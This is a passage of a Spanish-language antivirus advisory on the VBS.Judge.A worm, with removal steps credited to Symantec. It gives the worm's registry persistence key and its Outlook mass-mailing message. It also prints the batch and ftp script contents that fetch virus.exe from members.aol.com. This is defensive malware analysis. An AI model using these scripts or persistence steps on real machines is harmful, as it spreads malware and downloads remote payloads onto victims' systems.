C:\Judge.TXT.vbs
C:\Salut.mp3
C:\WINDOWS\WinGDI.EXE.vbs

2. Modifica la siguiente clave del registro de Windows, para poder ejecutarse en cada nuevo reinicio del sistema:

HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
WinGDI = C:\Windows\System\WinGDI.EXE.vbs

3. Envía el siguiente mensaje a todos los contactos de la libreta de direcciones del Outlook:

Asunto: BatMan, SpiderMan et les autres
Texto: La vraie histoire de ces justiciers
Archivo adjunto: Judge.TXT.vbs

4. Crea el siguiente archivo:

C:\Windows\FTP.bat

Este archivo de proceso por lotes (.BAT), contiene las siguientes instrucciones:

@echo off
start ftp -i -v -s:C:\FTP.drv

5. Crea el siguiente archivo:

C:\FTP.drv file

Este archivo (en realidad su contenido es texto plano), contiene los siguientes datos:

open
members.aol.com
pentasm99
binary
lcd C:\
get virus.exe
bye
exit

6. Ejecuta el archivo C:\Windows\FTP.bat

Esta acción intenta conectarse al servidor FTP de members.aol.com, para intentar descargar un archivo llamado VIRUS.EXE.

7. Si es el primer día de cualquier mes, el virus agrega las siguientes líneas al archivo de Windows: C:\Autoexec.bat

@echo off
cls
echo.
echo.
echo VBS.Judge.A par PetiK (c)2000
echo.
echo TON ORDINATEUR VIENT DE MOURIR
pause

Esto desplegará el siguiente mensaje en cada reinicio de Windows:

VBS.Judge.A par PetiK (c)2000

TON ORDINATEUR VIENT DE MOURIR
Presione cualquier tecla para continuar . . .

8. Crea el siguiente archivo:

C:\Judge.txt

Este archivo contiene el siguiente texto:

Si vous lisez ce texte,
c'est que Microsoft a encors fait des siennes

Como sacar el virus de un sistema infectado

1. Ejecute un antivirus al día, y borre los archivos que aparezcan infectados.

2. Pinche en Inicio, Ejecutar, y teclee REGEDIT (más ENTER).

3. En el panel izquierdo del editor de registro de Windows, pinche en el signo "+" hasta abrir la siguiente rama:

HKEY_LOCAL_MACHINE
Software
Microsoft
Windows
CurrentVersion
RunServices

4. Pinche sobre la carpeta "RunServices". En el panel de la derecha, busque y borre la siguiente clave:

WinGDI         C:\Windows\System\WinGDI.EXE.vbs

5. Use "Registro", "Salir" para salir del editor y confirmar los cambios.

6. Busque y borre los siguientes archivos:

C:\Windows\FTP.bat
C:\FTP.drv
C:\Judge.txt

7. Cómo medida preventiva, si usted no utiliza el comando FTP (en modo línea de comandos), presente en todas las versiones de Windows 9x y Me (C:\WINDOWS\FTP.EXE), renombre dicho archivo, por ejemplo, como FTP-.EXE. De ese modo, no podrá ser ejecutado, a menos que usted teclee FTP- (FTP + guión) desde una ventana MS-DOS (en lugar de solo FTP). Esto no afectará en absoluto el funcionamiento de Windows.

8. Reinicie su computadora (Inicio, Apagar el sistema, Reiniciar).

Fuente: Symantec AntiVirus Research Center (SARC)


Información complementaria

Para poder ver las extensiones verdaderas de los archivos y visualizar aquellos con atributos de "Oculto", proceda así:

• En Windows 95/98:
  Seleccione Mi PC, Menú Ver, Opciones (u Opciones de carpetas).
• En Windows Me:
  Seleccione Mi PC, Menú Herramientas, Opciones de carpetas.

Luego, en la lengüeta "Ver" de esa opción, DESMARQUE la opción "Ocultar extensiones para los tipos de archivos conocidos" o similar. También recomendamos que MARQUE la opción "Mostrar todos los archivos y carpetas ocultos" o similar.

Ver también:
24/feb/01 - Algunas recomendaciones sobre los virus escritos en VBS